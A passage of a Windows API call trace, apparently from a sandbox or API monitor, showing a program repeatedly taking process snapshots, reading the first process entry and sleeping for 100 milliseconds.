(in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.148] Sleep (dwMilliseconds=0x64) [0219.153] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0219.162] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.228] Sleep (dwMilliseconds=0x64) [0219.233] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0219.243] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.310] Sleep (dwMilliseconds=0x64) [0219.328] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0219.338] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.409] Sleep (dwMilliseconds=0x64) [0219.420] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0219.430] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.508] Sleep (dwMilliseconds=0x64) [0219.512] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0219.522] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.595] Sleep (dwMilliseconds=0x64) [0219.606] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0219.618] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.692] Sleep (dwMilliseconds=0x64) [0219.702] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0219.711] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.790] Sleep (dwMilliseconds=0x64) [0219.796] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0219.828] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0219.917] Sleep (dwMilliseconds=0x64) [0219.921] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0219.937] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.020] Sleep (dwMilliseconds=0x64) [0220.027] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0220.040] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.151] Sleep (dwMilliseconds=0x64) [0220.155] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0220.165] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.249] Sleep (dwMilliseconds=0x64) [0220.360] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0220.377] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.444] Sleep (dwMilliseconds=0x64) [0220.450] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0220.460] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.533] Sleep (dwMilliseconds=0x64) [0220.546] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0220.555] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.716] Sleep (dwMilliseconds=0x64) [0220.767] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0220.777] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.922] Sleep (dwMilliseconds=0x64) [0221.003] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0221.128] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.239] Sleep (dwMilliseconds=0x64) [0221.253] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0221.266] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.339] Sleep (dwMilliseconds=0x64) [0221.360] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0221.377] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.446] Sleep (dwMilliseconds=0x64) [0221.524] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0221.534] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.604] Sleep (dwMilliseconds=0x64) [0221.608] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0221.618] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.684] Sleep (dwMilliseconds=0x64) [0221.704] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0221.714] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.783] Sleep (dwMilliseconds=0x64) [0221.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0221.807] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.877] Sleep (dwMilliseconds=0x64) [0221.889] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0221.902] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.985] Sleep (dwMilliseconds=0x64) [0221.999] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0222.008] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.124] Sleep (dwMilliseconds=0x64) [0222.141] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0222.151] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.238] Sleep (dwMilliseconds=0x64) [0222.247] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0222.261] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.341] Sleep (dwMilliseconds=0x64) [0222.357] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0222.368] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.443] Sleep (dwMilliseconds=0x64) [0222.454] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0222.471] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.583] Sleep (dwMilliseconds=0x64) [0222.592] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0222.611] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.680] Sleep (dwMilliseconds=0x64) [0222.685] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0222.694] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.768] Sleep (dwMilliseconds=0x64) [0222.781] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0222.792] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.869] Sleep (dwMilliseconds=0x64) [0222.872] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0222.882] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0222.986] Sleep (dwMilliseconds=0x64) [0223.001] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0223.017] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.150] Sleep (dwMilliseconds=0x64) [0223.155] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0223.173] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.257] Sleep (dwMilliseconds=0x64) [0223.262] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0223.272] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.345] Sleep (dwMilliseconds=0x64) [0223.358] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0223.368] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.455] Sleep (dwMilliseconds=0x64) [0223.469] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0223.478] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.551] Sleep (dwMilliseconds=0x64) [0223.562] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0223.572] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.644] Sleep (dwMilliseconds=0x64) [0223.655] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0223.664] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.730] Sleep (dwMilliseconds=0x64) [0223.749] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0223.759] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.824] Sleep (dwMilliseconds=0x64) [0223.843] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0223.853] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0223.932] Sleep (dwMilliseconds=0x64) [0223.936] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0223.946] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.011] Sleep (dwMilliseconds=0x64) [0224.037] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0224.050] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.168] Sleep (dwMilliseconds=0x64) [0224.188] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0224.197] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.286] Sleep (dwMilliseconds=0x64) [0224.294] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0224.304] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.383] Sleep (dwMilliseconds=0x64) [0224.388] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0224.401] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.475] Sleep (dwMilliseconds=0x64) [0224.481] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0224.491] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.559] Sleep (dwMilliseconds=0x64) [0224.578] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0224.589] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.673] Sleep (dwMilliseconds=0x64) [0224.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0224.704] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.778] Sleep (dwMilliseconds=0x64) [0224.797] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0224.808] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0224.900] Sleep (dwMilliseconds=0x64) [0224.906] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0224.926] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.136] Sleep (dwMilliseconds=0x64) [0225.158] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0225.175] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.256] Sleep (dwMilliseconds=0x64) [0225.262] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0225.276] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.348] Sleep (dwMilliseconds=0x64) [0225.359] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0225.369] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.442] Sleep (dwMilliseconds=0x64) [0225.453] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0225.472] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.541] Sleep (dwMilliseconds=0x64) [0225.585] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0225.599] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.738] Sleep (dwMilliseconds=0x64) [0225.750] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0225.768] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.864] Sleep (dwMilliseconds=0x64) [0225.872] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0225.885] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0225.990] Sleep (dwMilliseconds=0x64) [0225.999] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x17b0 [0226.016] Process32First (in: hSnapshot=0x17b0, lppe=0xff6fe20 | out: lppe=0xff6fe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0226.147] Sleep (dwMilliseconds=0x64) 